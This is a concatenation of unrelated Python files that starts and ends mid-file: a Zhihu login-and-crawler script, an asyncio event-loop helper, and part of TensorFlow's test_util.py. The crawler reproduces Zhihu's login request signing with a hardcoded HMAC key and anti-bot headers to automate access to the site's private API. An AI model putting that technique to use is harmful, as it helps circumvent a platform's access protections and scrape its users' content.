uncheck Settings / Tools / Python Scientific / Show Plots in Toolwindow.
"""
if load_cookies and self.load_cookies():
self.logger.info('Loaded cookies file')
if self.check_login():
self.logger.info('Login successful')
return True
self.logger.warning('Cookies have expired')
self._check_user_pass()
self.login_data.update({
'username': self.username,
'password': self.password,
'lang': captcha_lang
})
timestamp = int(time.time() * 1000)
self.login_data.update({
'captcha': self._get_captcha(self.login_data['lang']),
'timestamp': timestamp,
'signature': self._get_signature(timestamp)
})
headers = self.session.headers.copy()
headers.update({
'content-type': 'application/x-www-form-urlencoded',
'x-zse-83': '3_2.0',
'x-xsrftoken': self._get_xsrf()
})
data = self._encrypt(self.login_data)
login_api = 'https://www.zhihu.com/api/v3/oauth/sign_in'
resp = self.session.post(login_api, data=data, headers=headers)
if 'error' in resp.text:
self.logger.warning(json.loads(resp.text)['error'])
if self.check_login():
self.logger.info('Login successful')
return True
self.logger.warning('Login failed')
return False
def load_cookies(self):
"""
Load the cookies file into the session.
:return: bool
"""
try:
self.session.cookies.load(ignore_discard=True)
return True
except FileNotFoundError:
return False
def check_login(self):
"""
Check login status: a redirect when visiting the login page means we are
already logged in; if the login is valid, save the current cookies.
:return: bool
"""
login_url = 'https://www.zhihu.com/signup'
resp = self.session.get(login_url, allow_redirects=False)
if resp.status_code == 302:
self.session.cookies.save()
return True
return False
def _get_xsrf(self):
"""
Fetch the _xsrf token from the login page.
:return: str
"""
self.session.get('https://www.zhihu.com/', allow_redirects=False)
for c in self.session.cookies:
if c.name == '_xsrf':
return c.value
raise AssertionError('Failed to get xsrf')
def _get_captcha(self, lang: str):
"""
Request the captcha API endpoint; it must be called once whether or not
a captcha is required. If one is required, the image is returned as a
base64 string. The captcha type follows the lang parameter and must be
entered manually.
:param lang: language of the returned captcha (en/cn)
:return: the captcha POST parameter
"""
if lang == 'cn':
api = 'https://www.zhihu.com/api/v3/oauth/captcha?lang=cn'
else:
api = 'https://www.zhihu.com/api/v3/oauth/captcha?lang=en'
resp = self.session.get(api)
show_captcha = re.search(r'true', resp.text)
if show_captcha:
put_resp = self.session.put(api)
json_data = json.loads(put_resp.text)
img_base64 = json_data['img_base64'].replace(r'\n', '')
with open('./captcha.jpg', 'wb') as f:
f.write(base64.b64decode(img_base64))
img = Image.open('./captcha.jpg')
if lang == 'cn':
import matplotlib.pyplot as plt
plt.imshow(img)
self.logger.info('Click all upside-down characters, then press Enter in the terminal to submit')
points = plt.ginput(7)
capt = json.dumps({'img_size': [200, 44],
'input_points': [[i[0] / 2, i[1] / 2] for i in points]})
else:
# img_thread = threading.Thread(target=img.show, daemon=True)
img_thread = threading.Thread(target=send_mail, args=(
self.sender, self.receivers, self.mail_pass,
'Zhihu captcha:\n<img src=\"cid:image1\">', 'captcha.jpg'),
daemon=True)
img_thread.start()
# A captcha-recognition module could be integrated here
capt = input('Enter the captcha shown in the image: ')
# The parameter must first be POSTed to the captcha API
self.session.post(api, data={'input_text': capt})
return capt
return ''
def _generate_captcha_text(self, img_stream):
return pytesseract.image_to_string(img_stream)
def _get_signature(self, timestamp: int or str):
"""
Compute and return the signature with HMAC-SHA1.
In practice it is just a few fixed strings plus the timestamp.
:param timestamp: timestamp in milliseconds
:return: signature
"""
ha = hmac.new(b'd1b964811afb40118a12068ff74a12f4', digestmod=hashlib.sha1)
grant_type = self.login_data['grant_type']
client_id = self.login_data['client_id']
source = self.login_data['source']
# ha.update(bytes((grant_type + client_id + source + str(timestamp)), 'utf-8'))
ha.update((grant_type + client_id + source + str(timestamp)).encode('utf-8'))
return ha.hexdigest()
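# --- Hedged illustration (editorial, commented out): the standalone
# equivalent of the signature step above, using the fixed login_data
# fields and a made-up timestamp:
#   ha = hmac.new(b'd1b964811afb40118a12068ff74a12f4', digestmod=hashlib.sha1)
#   ha.update(('password' + 'c3cef7c66a1843f8b3a9e6a1e3160e20' +
#              'com.zhihu.web' + '1600000000000').encode('utf-8'))
#   ha.hexdigest()  # -> 40-character hex signature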
def _check_user_pass(self):
"""
Check whether the username and password were supplied; prompt for them if not.
"""
if not self.username:
self.username = input('Enter phone number: ')
if self.username.isdigit() and '+86' not in self.username:
self.username = '+86' + self.username
if not self.password:
self.password = input('Enter password: ')
@staticmethod
def _encrypt(form_data: dict):
with open('./encrypt.js') as f:
js = execjs.compile(f.read())
# js = execjs.compile(f.read(), cwd=r'C:\Users\Administrator\AppData\Roaming\npm\node_modules')
return js.call('b', urlencode(form_data))
class ZhihuCrawler(object):
'''
This project crawls the recommendation feed shown after the user logs in.
The data comes in three main types: zvideo, answer and article; zvideo and article both seem rather useless, so only the answer and article types are captured here.
'''
def __init__(self, username=None, password=None, sender=None, receivers=None, mail_pass=None):
# Initialize logging
self.logger = Logger().logger
# Initialize cookies
self.account = ZhihuAccount(username, password, sender, receivers, mail_pass, logger=self.logger)
self.account.login(captcha_lang='en', load_cookies=True)
# Load cookies into the session
self.session = requests.session()
self.session.cookies = cookiejar.LWPCookieJar(filename='./cookies.txt')
self.session.cookies.load(ignore_discard=True)
self.first_url = 'https://www.zhihu.com/'
self.headers = {
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36',
}
# Initialize the MongoDB database
self.mongo = MongoClient('mongodb://127.0.0.1:27017')
self.collection = self.mongo['zhihu']['data']
def __del__(self):
self.mongo.close()
def _get_page(self, next_url=None):
url = next_url
try:
if url is None:
self.logger.info('Fetching the first page***')
resp = self.session.get(self.first_url, headers=self.headers)
if resp.status_code == 200:
return resp
else:
raise Exception(f'{resp.status_code}')
else:
url = url.encode().decode("raw_unicode_escape")
headers = self.headers
headers['referer'] = 'https://www.zhihu.com/'
self.logger.info(f'Fetching the next page***{url}')
resp = self.session.get(url, headers=headers)
if resp.status_code == 200:
return resp
else:
raise Exception(f'{resp.status_code}')
except:
self.account.login(captcha_lang='en', load_cookies=False)
self.session.cookies = cookiejar.LWPCookieJar(filename='./cookies.txt')
self.session.cookies.load(ignore_discard=True)
self.logger.warning(f'Encountered a cookie error, now retrying _get_page({url}).')
time.sleep(random.uniform(1, 4))
return self._get_page(url)  # propagate the retried response to the caller
def _get_first_page_html(self, response):
html = response.content.decode()
# with open('zhihu.html', 'w', encoding='utf-8') as f:
# f.write(html)
return html
def _get_first_page_data(self, html):
data = dict()
initial_data = re.findall('<script id="js-initialData" type="text/json">(.*?)</script>', html).pop()
initial_data = initial_data.encode().decode('raw_unicode_escape')
json_data = json.loads(initial_data)
json_answers = json_data['initialState']['entities'].get('answers')
item_list = list()
for answer_id, detail in json_answers.items():
# one recommended item
item = dict()
item['id'] = answer_id
item['type'] = detail.get('type', None)
item['url'] = detail.get('url', None)
item['author'] = dict()
item['author']['userType'] = detail['author'].get('userType', None)
item['author']['name'] = detail['author'].get('name', None)
item['createdTime'] = detail.get('createdTime', None)
item['updatedTime'] = detail.get('updatedTime', None)
item['votedupCount'] = detail.get('voteupCount', None)
item['thanksCount'] = detail.get('thanksCount', None)
item['commentCount'] = detail.get('commentCount', None)
item['question'] = dict()
item['question']['id'] = detail['question'].get('id', None)
item['question']['type'] = detail['question'].get('type', None)
item['question']['url'] = detail['question'].get('url', None)
item['question']['title'] = detail['question'].get('title', None)
item['content'] = detail.get('content', None)
item_list.append(item)
# .pop() on an empty findall() result raises IndexError once is_end is
# true, so test the match list directly instead
if re.findall('"is_end":false', html):
next_url = re.findall('"paging".*?"next":"(.*?)"', html, re.DOTALL).pop()
data['next_url'] = next_url
data['item_list'] = item_list
return data
def _save_data(self, data):
for item in data.get('item_list'):
item['_id'] = item.get('id')
try:
self.collection.insert_one(item)
except DuplicateKeyError as e:
self.logger.warning(e)
return
def _get_json(self, response):
return response.json()
def _get_data(self, json):
data = dict()
item_list = list()
for each in json.get('data'):
print(each['target'].get('type'))
if each['target'].get('type') == 'zvideo':
continue
item = dict()
target = each.get('target')
item['id'] = target.get('id', None)
item['type'] = target.get('type', None)
item['url'] = target.get('url', None)
item['author'] = dict()
item['author']['userType'] = target['author'].get('user_type', None)
item['author']['name'] = target['author'].get('name', None)
item['createdTime'] = target.get('created_time', None)
item['updatedTime'] = target.get('updated_time', None)
item['votedupCount'] = target.get('voteup_count', None)
item['thanksCount'] = target.get('thanks_count', None)
item['commentCount'] = target.get('comment_count', None)
if item['type'] == 'answer':
item['question'] = dict()
item['question']['id'] = target['question'].get('id', None)
item['question']['type'] = target['question'].get('type', None)
item['question']['url'] = target['question'].get('url', None)
item['question']['title'] = target['question'].get('title', None)
item['content'] = target.get('content', None)
item_list.append(item)
is_end = json['paging'].get('is_end')
if not is_end:
next_url = json['paging'].get('next')
data['next_url'] = next_url.encode().decode('raw_unicode_escape')
data['item_list'] = item_list
return data
def run(self):
self.logger.info('Crawl started***')
next_url = None
# 1 request the home page and get the response
response = self._get_page(next_url)
# 2 parse the response
html = self._get_first_page_html(response)
# 3 extract the data
data = self._get_first_page_data(html)
# 4 save the data
self._save_data(data)
# request the next page
next_url = data.get('next_url', None)
time.sleep(5)
while True:
# try:
# 1 send the request and get the response
response = self._get_page(next_url)
# 2 parse the response
json = self._get_json(response)
# 3 extract the data
data = self._get_data(json)
# 4 save the data
self._save_data(data)
# request the next page
next_url = data.get('next_url', None)
if next_url is None:
break
time.sleep(5)
# except Exception as e:
# print(e)
self.logger.info('Crawl finished***')
class Logger(object):
def __init__(self):
# Get the logger object
self._logger = logging.getLogger()
# Set up the formatter
self.formatter = logging.Formatter(fmt='%(asctime)s %(filename)s [line:%(lineno)d] %(levelname)s: %(message)s',
datefmt='%Y-%m-%d %H:%M:%S')
# Attach the log handlers
self._logger.addHandler(self._get_file_handler('log.log'))
self._logger.addHandler(self._get_console_handler())
# Set the log level
self._logger.setLevel(logging.INFO)
def _get_file_handler(self, filename):
'''
Get the file log handler.
:param filename: file name
:return: filehandler
'''
# Instantiate the FileHandler class
filehandler = logging.FileHandler(filename=filename, encoding='utf-8')
# Set the log format
filehandler.setFormatter(self.formatter)
return filehandler
def _get_console_handler(self):
'''
Get the console log handler.
:return: consolehandler
'''
# Instantiate the StreamHandler class
consolehandler = logging.StreamHandler(sys.stdout)
# Set the log format
consolehandler.setFormatter(self.formatter)
return consolehandler
@property
def logger(self):
return self._logger
def send_mail(sender, receivers, mail_pass, content, image):
# Third-party SMTP service
mail_host = "smtp.qq.com" # SMTP server
message = MIMEMultipart()
message.attach(MIMEText(content, 'html', 'utf-8')) # body content; 'plain' means plain text, 'html' allows HTML
message['From'] = sender
message['To'] = ','.join(receivers) # not the same thing as the actual recipient addresses
subject = '%s automated mail-%s' % (os.path.basename(__file__), time.ctime())
message['Subject'] = subject # mail subject
# Display the image in the body
with open(image, 'rb') as f:
# attach the image to the body
msgImage = MIMEImage(f.read())
# define the image ID
msgImage.add_header('Content-ID', '<image1>')
message.attach(msgImage)
try:
smtpObj = smtplib.SMTP_SSL(mail_host, 465)
smtpObj.login(sender, mail_pass)
smtpObj.sendmail(sender, receivers, str(message)) # message.as_string()
smtpObj.quit()
print("Captcha email sent to %s" % receivers[0])
except smtplib.SMTPException as e:
print(e)
if __name__ == '__main__':
# Enter username and password to log in
username = ''
password = ''
sender = ''
receivers = ['']
mail_pass = ''
crawler = ZhihuCrawler(username, password, sender, receivers, mail_pass)
crawler.run()
|
internals.py
|
import asyncio
import atexit
import sys
from logging import disable, CRITICAL
from threading import Thread
def __run_loop(loop: asyncio.AbstractEventLoop):
asyncio.set_event_loop(loop)
loop.run_forever()
def __stop_loop(loop: asyncio.AbstractEventLoop, thread: Thread): # pragma: no cover
disable(CRITICAL)
tasks = []
if py_ver.major == 3 and py_ver.minor >= 7:
caller = asyncio
else:
caller = asyncio.Task
for task in caller.all_tasks(loop):
task.cancel()
tasks.append(task)
cancelled = False
shutdown = asyncio.run_coroutine_threadsafe(loop.shutdown_asyncgens(), loop)
shutdown.result()
while not cancelled:
cancelled = True
for task in tasks:
if not task.done():
cancelled = False
loop.call_soon_threadsafe(loop.stop)
thread.join()
# the loop has already stopped and its thread has joined, so close it
# directly; a callback scheduled on a stopped loop would never run
loop.close()
def __clear_loop(): # pragma: no cover
__stop_loop(POKE_LOOP, _t)
POKE_LOOP = asyncio.new_event_loop()
py_ver = sys.version_info
_t = Thread(target=__run_loop, args=(POKE_LOOP,), daemon=True)
_t.start()
atexit.register(__clear_loop)
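# --- Hedged usage sketch (editorial; `demo` is a hypothetical coroutine) ---
# Synchronous code can schedule work onto the background loop like this:
#   async def demo():
#       await asyncio.sleep(0.1)
#       return "done"
#   future = asyncio.run_coroutine_threadsafe(demo(), POKE_LOOP)
#   future.result(timeout=1)  # -> "done"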
|
test_util.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Test utils for tensorflow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
from collections import OrderedDict
import contextlib
import functools
import gc
import itertools
import math
import os
import random
import re
import tempfile
import threading
import time
import unittest
from absl.testing import parameterized
import numpy as np
import six
from google.protobuf import descriptor_pool
from google.protobuf import text_format
from tensorflow.core.framework import graph_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python import _pywrap_stacktrace_handler
from tensorflow.python import _pywrap_util_port
from tensorflow.python import tf2
from tensorflow.python.client import device_lib
from tensorflow.python.client import pywrap_tf_session
from tensorflow.python.client import session
from tensorflow.python.compat.compat import forward_compatibility_horizon
from tensorflow.python.eager import context
from tensorflow.python.eager import def_function
from tensorflow.python.eager import tape
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import gpu_util
from tensorflow.python.framework import importer
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_shape
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import control_flow_util_v2
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import summary_ops_v2
from tensorflow.python.ops import variables
from tensorflow.python.ops.ragged import ragged_ops # pylint: disable=unused-import
from tensorflow.python.ops.ragged import ragged_tensor
from tensorflow.python.ops.ragged import ragged_tensor_value
from tensorflow.python.platform import googletest
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import server_lib
from tensorflow.python.util import compat
from tensorflow.python.util import deprecation
from tensorflow.python.util import nest
from tensorflow.python.util import tf_decorator
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.compat import collections_abc
from tensorflow.python.util.protobuf import compare
from tensorflow.python.util.tf_export import tf_export
# If the below import is made available through the BUILD rule, then this
# function is overridden and will instead return True and cause Tensorflow
# graphs to be compiled with XLA.
def is_xla_enabled():
return False
try:
from tensorflow.python.framework.is_xla_test_true import is_xla_enabled # pylint: disable=g-import-not-at-top, unused-import
except Exception: # pylint: disable=broad-except
pass
# Uses the same mechanism as above to selectively enable MLIR compilation.
def is_mlir_bridge_enabled():
return False
try:
from tensorflow.python.framework.is_mlir_bridge_test_true import is_mlir_bridge_enabled # pylint: disable=g-import-not-at-top, unused-import
except Exception: # pylint: disable=broad-except
pass
# Uses the same mechanism as above to selectively enable TFRT.
def is_tfrt_enabled():
return False
try:
from tensorflow.python.framework.is_tfrt_test_true import is_tfrt_enabled # pylint: disable=g-import-not-at-top, unused-import
except Exception: # pylint: disable=broad-except
pass
def _get_object_count_by_type():
return collections.Counter([type(obj).__name__ for obj in gc.get_objects()])
@tf_export("test.gpu_device_name")
def gpu_device_name():
"""Returns the name of a GPU device if available or the empty string."""
for x in device_lib.list_local_devices():
if x.device_type == "GPU" or x.device_type == "SYCL":
return compat.as_str(x.name)
return ""
def assert_ops_in_graph(expected_ops, graph):
"""Assert all expected operations are found.
Args:
expected_ops: `dict<string, string>` of op name to op type.
graph: Graph to check.
Returns:
`dict<string, node>` of node name to node.
Raises:
ValueError: If the expected ops are not present in the graph.
"""
actual_ops = {}
gd = graph.as_graph_def()
for node in gd.node:
if node.name in expected_ops:
if expected_ops[node.name] != node.op:
raise ValueError("Expected op for node %s is different. %s vs %s" %
(node.name, expected_ops[node.name], node.op))
actual_ops[node.name] = node
if set(expected_ops.keys()) != set(actual_ops.keys()):
raise ValueError("Not all expected ops are present. Expected %s, found %s" %
(expected_ops.keys(), actual_ops.keys()))
return actual_ops
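# Hedged usage sketch (editorial, not part of the original file):
#   with ops.Graph().as_default() as g:
#     array_ops.placeholder(dtypes.float32, name="x")
#   assert_ops_in_graph({"x": "Placeholder"}, g)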
@tf_export("test.assert_equal_graph_def", v1=[])
def assert_equal_graph_def_v2(expected, actual):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent. This function
ignores randomized attribute values that may appear in V2 checkpoints.
Args:
expected: The `GraphDef` we expected.
actual: The `GraphDef` we have.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2=True,
hash_table_shared_name=True)
@tf_export(v1=["test.assert_equal_graph_def"])
def assert_equal_graph_def_v1(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
"""Asserts that two `GraphDef`s are (mostly) the same.
Compares two `GraphDef` protos for equality, ignoring versions and ordering of
nodes, attrs, and control inputs. Node names are used to match up nodes
between the graphs, so the naming of nodes must be consistent.
Args:
actual: The `GraphDef` we have.
expected: The `GraphDef` we expected.
checkpoint_v2: boolean determining whether to ignore randomized attribute
values that appear in V2 checkpoints.
hash_table_shared_name: boolean determining whether to ignore randomized
shared_names that appear in HashTableV2 op defs.
Raises:
AssertionError: If the `GraphDef`s do not match.
TypeError: If either argument is not a `GraphDef`.
"""
assert_equal_graph_def(actual, expected, checkpoint_v2,
hash_table_shared_name)
def assert_equal_graph_def(actual, expected, checkpoint_v2=False,
hash_table_shared_name=False):
if not isinstance(actual, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for actual, got %s" %
type(actual).__name__)
if not isinstance(expected, graph_pb2.GraphDef):
raise TypeError("Expected tf.GraphDef for expected, got %s" %
type(expected).__name__)
if checkpoint_v2:
_strip_checkpoint_v2_randomized(actual)
_strip_checkpoint_v2_randomized(expected)
if hash_table_shared_name:
_strip_hash_table_shared_name(actual)
_strip_hash_table_shared_name(expected)
diff = pywrap_tf_session.EqualGraphDefWrapper(actual.SerializeToString(),
expected.SerializeToString())
if diff:
raise AssertionError(compat.as_str(diff))
def assert_meta_graph_protos_equal(tester, a, b):
"""Compares MetaGraphDefs `a` and `b` in unit test class `tester`."""
# Carefully check the collection_defs
tester.assertEqual(set(a.collection_def), set(b.collection_def))
collection_keys = a.collection_def.keys()
for k in collection_keys:
a_value = a.collection_def[k]
b_value = b.collection_def[k]
proto_type = ops.get_collection_proto_type(k)
if proto_type:
a_proto = proto_type()
b_proto = proto_type()
# Number of entries in the collections is the same
tester.assertEqual(
len(a_value.bytes_list.value), len(b_value.bytes_list.value))
for (a_value_item, b_value_item) in zip(a_value.bytes_list.value,
b_value.bytes_list.value):
a_proto.ParseFromString(a_value_item)
b_proto.ParseFromString(b_value_item)
tester.assertProtoEquals(a_proto, b_proto)
else:
tester.assertEquals(a_value, b_value)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("collection_def")
b.ClearField("collection_def")
# Check the graph_defs.
assert_equal_graph_def(a.graph_def, b.graph_def, checkpoint_v2=True)
# Check graph_def versions (ignored by assert_equal_graph_def).
tester.assertProtoEquals(a.graph_def.versions, b.graph_def.versions)
# Compared the fields directly, remove their raw values from the
# proto comparison below.
a.ClearField("graph_def")
b.ClearField("graph_def")
tester.assertProtoEquals(a, b)
# Matches attributes named via _SHARDED_SUFFIX in
# tensorflow/python/training/saver.py
_SHARDED_SAVE_OP_PATTERN = "_temp_[0-9a-z]{32}/part"
def _strip_checkpoint_v2_randomized(graph_def):
for node in graph_def.node:
delete_keys = []
for attr_key in node.attr:
attr_tensor_value = node.attr[attr_key].tensor
if attr_tensor_value and len(attr_tensor_value.string_val) == 1:
attr_tensor_string_value = attr_tensor_value.string_val[0]
if (attr_tensor_string_value and
re.match(_SHARDED_SAVE_OP_PATTERN, str(attr_tensor_string_value))):
delete_keys.append(attr_key)
for attr_key in delete_keys:
del node.attr[attr_key]
_TABLE_SHARED_NAME_PATTERN = r"hash_table_[0-9a-z\-]+"
def _strip_hash_table_shared_name(graph_def):
for node in graph_def.node:
delete_keys = []
if node.op == "HashTableV2" and "shared_name" in node.attr:
if re.match(_TABLE_SHARED_NAME_PATTERN, str(node.attr["shared_name"].s)):
delete_keys.append("shared_name")
for attr_key in delete_keys:
del node.attr[attr_key]
def IsGoogleCudaEnabled():
return _pywrap_util_port.IsGoogleCudaEnabled()
def IsBuiltWithROCm():
return _pywrap_util_port.IsBuiltWithROCm()
def IsBuiltWithXLA():
return _pywrap_util_port.IsBuiltWithXLA()
def IsBuiltWithNvcc():
return _pywrap_util_port.IsBuiltWithNvcc()
def GpuSupportsHalfMatMulAndConv():
return _pywrap_util_port.GpuSupportsHalfMatMulAndConv()
def IsMklEnabled():
return _pywrap_util_port.IsMklEnabled()
def InstallStackTraceHandler():
_pywrap_stacktrace_handler.InstallStacktraceHandler()
def NHWCToNCHW(input_tensor):
"""Converts the input from the NHWC format to NCHW.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 3, 1, 2], 5: [0, 4, 1, 2, 3]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
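# Example (editorial sketch): applied to a plain shape list,
#   NHWCToNCHW([1, 224, 224, 3]) -> [1, 3, 224, 224]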
def NHWCToNCHW_VECT_C(input_shape_or_tensor):
"""Transforms the input from the NHWC layout to NCHW_VECT_C layout.
Note: Does not include quantization or type conversion steps, which should
be applied afterwards.
Args:
input_shape_or_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NCHW_VECT_C
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not evenly
divisible by 4.
"""
permutations = {5: [0, 3, 1, 2, 4], 6: [0, 4, 1, 2, 3, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
temp_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if temp_shape[-1] % 4 != 0:
raise ValueError(
"Last dimension of input must be evenly divisible by 4 to convert to "
"NCHW_VECT_C.")
temp_shape[-1] //= 4
temp_shape.append(4)
permutation = permutations[len(temp_shape)]
if is_tensor:
t = array_ops.reshape(input_shape_or_tensor, temp_shape)
return array_ops.transpose(t, permutation)
else:
return [temp_shape[a] for a in permutation]
def NCHW_VECT_CToNHWC(input_shape_or_tensor):
"""Transforms the input from the NCHW_VECT_C layout to NHWC layout.
Note: Does not include de-quantization or type conversion steps, which should
be applied beforehand.
Args:
input_shape_or_tensor: a 5- or 6-D tensor, or an array representing shape
Returns:
tensor or shape array transformed into NHWC
Raises:
ValueError: if last dimension of `input_shape_or_tensor` is not 4.
"""
permutations = {5: [0, 2, 3, 1, 4], 6: [0, 2, 3, 4, 1, 5]}
is_tensor = isinstance(input_shape_or_tensor, ops.Tensor)
input_shape = (
input_shape_or_tensor.shape.as_list()
if is_tensor else input_shape_or_tensor)
if input_shape[-1] != 4:
raise ValueError("Last dimension of NCHW_VECT_C must be 4.")
permutation = permutations[len(input_shape)]
nhwc_shape = [input_shape[a] for a in permutation[:-1]]
nhwc_shape[-1] *= input_shape[-1]
if is_tensor:
t = array_ops.transpose(input_shape_or_tensor, permutation)
return array_ops.reshape(t, nhwc_shape)
else:
return nhwc_shape
def NCHWToNHWC(input_tensor):
"""Converts the input from the NCHW format to NHWC.
Args:
input_tensor: a 4- or 5-D tensor, or an array representing shape
Returns:
converted tensor or shape array
"""
# tensor dim -> new axis order
new_axes = {4: [0, 2, 3, 1], 5: [0, 2, 3, 4, 1]}
if isinstance(input_tensor, ops.Tensor):
ndims = input_tensor.shape.ndims
return array_ops.transpose(input_tensor, new_axes[ndims])
else:
ndims = len(input_tensor)
return [input_tensor[a] for a in new_axes[ndims]]
def skip_if(condition):
"""Skips the decorated function if condition is or evaluates to True.
Args:
condition: Either an expression that can be used in "if not condition"
statement, or a callable whose result should be a boolean.
Returns:
The wrapped function
"""
def real_skip_if(fn):
def wrapper(*args, **kwargs):
if callable(condition):
skip = condition()
else:
skip = condition
if not skip:
return fn(*args, **kwargs)
return wrapper
return real_skip_if
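# Hedged usage sketch (editorial): skip a test when no GPU is visible.
#   @skip_if(lambda: not gpu_device_name())
#   def testNeedsGpu(self):
#     ...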
@contextlib.contextmanager
def skip_if_error(test_obj, error_type, messages=None):
"""Context manager to skip cases not considered failures by the tests.
Note that this does not work if used in setUpClass/tearDownClass.
Usage in setUp/tearDown works fine just like regular test methods.
Args:
test_obj: A test object provided as `self` in the test methods; this object
is usually an instance of `unittest.TestCase`'s subclass and should have
`skipTest` method.
error_type: The error type to skip. Note that if `messages` are given, both
`error_type` and `messages` need to match for the test to be skipped.
messages: Optional, a string or list of strings. If `None`, the test will be
skipped if `error_type` matches what is raised; otherwise, the test is
skipped if any of the `messages` is contained in the message of the error
raised, and `error_type` matches the error raised.
Yields:
Nothing.
"""
if messages:
messages = nest.flatten(messages)
try:
yield
except error_type as e:
if not messages or any(message in str(e) for message in messages):
test_obj.skipTest("Skipping error: {}".format(str(e)))
else:
raise
def enable_c_shapes(fn):
"""No-op. TODO(b/74620627): Remove this."""
return fn
def with_c_shapes(cls):
"""No-op. TODO(b/74620627): Remove this."""
return cls
def enable_control_flow_v2(fn):
"""Decorator for enabling CondV2 and WhileV2 on a test.
Note this enables using CondV2 and WhileV2 after running the test class's
setup/teardown methods.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
enable_control_flow_v2_old = control_flow_util.ENABLE_CONTROL_FLOW_V2
control_flow_util.ENABLE_CONTROL_FLOW_V2 = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util.ENABLE_CONTROL_FLOW_V2 = enable_control_flow_v2_old
return wrapper
def with_control_flow_v2(cls):
"""Adds methods that call original methods with WhileV2 and CondV2 enabled.
Note this enables CondV2 and WhileV2 in new methods after running the test
class's setup method.
In addition to this, callers must import the while_v2 module in order to set
the _while_v2 module in control_flow_ops.
If a test function has _disable_control_flow_v2 attr set to True (using the
@disable_control_flow_v2 decorator), the v2 function is not generated for it.
Example:
@test_util.with_control_flow_v2
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
@test_util.disable_control_flow_v2("b/xyzabc")
def testDisabledForV2(self):
...
Generated class:
class ControlFlowTest(test.TestCase):
def testEnabledForV2(self):
...
def testEnabledForV2WithControlFlowV2(self):
// Enable V2 flags.
testEnabledForV2(self)
// Restore V2 flags.
def testDisabledForV2(self):
...
Args:
cls: class to decorate
Returns:
cls with new test methods added
"""
if control_flow_util.ENABLE_CONTROL_FLOW_V2:
return cls
for name, value in cls.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix) and
not getattr(value, "_disable_control_flow_v2", False)):
setattr(cls, name + "WithControlFlowV2", enable_control_flow_v2(value))
return cls
def disable_control_flow_v2(unused_msg):
"""Decorator for a function in a with_control_flow_v2 enabled test class.
Blocks the function from being run with v2 control flow ops.
Args:
unused_msg: Reason for disabling.
Returns:
The wrapped function with _disable_control_flow_v2 attr set to True.
"""
def wrapper(func):
func._disable_control_flow_v2 = True
return func
return wrapper
def enable_output_all_intermediates(fn):
"""Force-enable outputing all intermediates from functional control flow ops.
Args:
fn: the function to be wrapped
Returns:
The wrapped function
"""
def wrapper(*args, **kwargs):
output_all_intermediates_old = \
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = True
try:
return fn(*args, **kwargs)
finally:
control_flow_util_v2._EXPERIMENTAL_OUTPUT_ALL_INTERMEDIATES_OVERRIDE = \
output_all_intermediates_old
return wrapper
def assert_no_new_pyobjects_executing_eagerly(func=None, warmup_iters=2):
"""Decorator for asserting that no new Python objects persist after a test.
Runs the test multiple times executing eagerly, first as a warmup and then to
let objects accumulate. The warmup helps ignore caches which do not grow as
the test is run repeatedly.
Useful for checking that there are no missing Py_DECREFs in the C exercised by
a bit of Python.
Args:
func: The function to test.
warmup_iters: The number of warmup iterations, excluded from measuring.
Returns:
The wrapped function performing the test.
"""
def wrap_f(f):
def decorator(self, *args, **kwargs):
"""Warms up, gets object counts, runs the test, checks for new objects."""
with context.eager_mode():
gc.disable()
# Run the test 2 times as warmup, in an attempt to fill up caches, which
# should not grow as the test is run repeatedly below.
#
# TODO(b/117156879): Running warmup twice is black magic; we have seen
# tests that fail with 1 warmup run, and pass with 2, on various
# versions of python2.7.x.
for _ in range(warmup_iters):
